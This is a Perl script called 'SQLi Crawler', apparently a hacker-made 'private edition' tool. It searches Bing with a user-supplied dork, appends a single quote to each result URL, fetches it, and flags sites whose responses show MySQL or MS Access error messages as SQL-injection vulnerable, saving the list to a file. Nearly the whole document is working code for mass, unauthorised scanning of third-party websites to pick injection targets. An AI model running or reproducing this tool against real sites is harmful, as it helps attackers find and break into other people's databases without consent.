SQLi Crawler












#!/usr/bin/perl

use strict;

use warnings;

use HTTP::Request;

use LWP::UserAgent;

######

my $dork;

my $url;

my $i;

my $request;

my $useragent;

my $response;

my $start;

my $end;

my $result;

my $fl;

my $link;

my $req;

my $ua;

my $result2;

my $res;

my $save;

my $pages;

my $page;

my $choice;

######

my @z;

print q{

     _ ____      _  

    | |  _ \      | | 

  __| | |_) | ___ | |_

/ _` |  _ < / _ \| __|

| (_| | |_) | (_) | |_

\__,_|____/ \___/ \__|

######

##      / SQLi Crawler /      ##

##      Private Edition      ##

##      ~Coded by dbx~      ##

######

};

MainMenu:

print "------\n";

print "Enter [1] To Begin SQLi.\n";

print "Enter [2] To Exit.\n";

print "------\n\n";

print "Your Choice: ";

chomp ($choice = <STDIN>);

print "\n";

if ($choice eq 1) {&sql_scan}

if ($choice eq 5) {die;}

sub sql_scan

{

print "[+] Enter Bing! dork: ";

chomp ($dork = <STDIN>);

print "\n";

print "[+] How Many Pages To Leech?: ";

chomp ($pages = <STDIN>);

print "\n";

$page = $pages.'1';

print "[~] Crawling...\n\n";

for ($i = 0; $i <= $page; $i=$i+11)

{

$url = "http://www.bing.com/search?q=$dork&go=&qs=n&sk=&sc=8-13&first=$i";

$request = HTTP::Request->new(GET => $url);

$useragent = LWP::UserAgent->new();

$response = $useragent->request($request);

$result = $response->content;

$start = '<h3><a href="';

$end = '" onmousedown=';

while ($result =~ m/$start(.*?)$end/g)

{

     $fl = $1;

     $link = $fl."%27";

     $req = HTTP::Request->new(GET => $link);

     $ua = LWP::UserAgent->new();

     $res = $ua->request($req);

     $result2 = $res->content;

      if ($result2=~ m/You have an error in your SQL syntax/i || $result2=~ m/Query failed/i || $result2=~ m/SQL query failed/i || $result2=~ m/mysql_fetch_/i || $result2=~ m/mysql_fetch_array/i || $result2 =~ m/mysql_num_rows/i || $result2 =~ m/The used SELECT statements have a different number of columns/i )

      {

      push @z, $link;

      print "[+] MySQL Vulnerable: $link\n\n";

      }

      elsif ($result2 =~ m/Microsoft JET Database/i || $result2 =~ m/ODBC Microsoft Access Driver/i )

      {

      push @z, $link;

      print "[+] MsSQL Vulnerable: $link\n\n";

      }

      else {

            print "[-] $link <- Not Vulnerable\n\n";

      }

}

}

    print "Vulnerable Links:\n";

    print "------\n";

foreach (@z)

{

    print "$_ \n\n";

}

print "Save Into A Text File? (Y or N): ";

chomp ($save = <STDIN>);

if ($save eq 'Y')

{

    print "Saving File...\n\n";

    open(vuln_file, ">>Vulns.txt");

    foreach (@z)

    {

      print vuln_file "$_ \n";

    }

    close(vuln_file);

    print "File Saved!\n\n";

}

goto MainMenu;

}